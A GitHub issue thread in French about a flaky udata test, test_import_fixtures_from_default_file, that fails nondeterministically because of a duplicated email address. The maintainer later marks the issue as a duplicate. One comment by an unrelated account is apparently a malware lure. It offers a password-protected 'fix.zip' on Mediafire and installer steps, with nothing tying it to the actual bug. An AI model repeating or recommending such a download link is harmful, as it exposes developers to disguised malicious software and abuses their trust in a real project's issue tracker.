### ISSUE TITLE
Corriger le test *flaky* sur les fixtures

### ISSUE THREAD

**Issue by maudetes** [datagouv/data.gouv.fr#1436]
A cause d'adresse email dupliquée, udata/commands/tests/test_fixtures.py::FixturesTest::test_import_fixtures_from_default_file` échoue de manière non déterministe.

Dernière occurrence en date : https://app.circleci.com/pipelines/github/opendatateam/udata/5077/workflows/d504805f-8518-476f-b1d4-64146bc24a82/jobs/31283/tests#failed-test-0

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by maudetes** [comment]
Duplicate of https://github.com/datagouv/data.gouv.fr/issues/1466
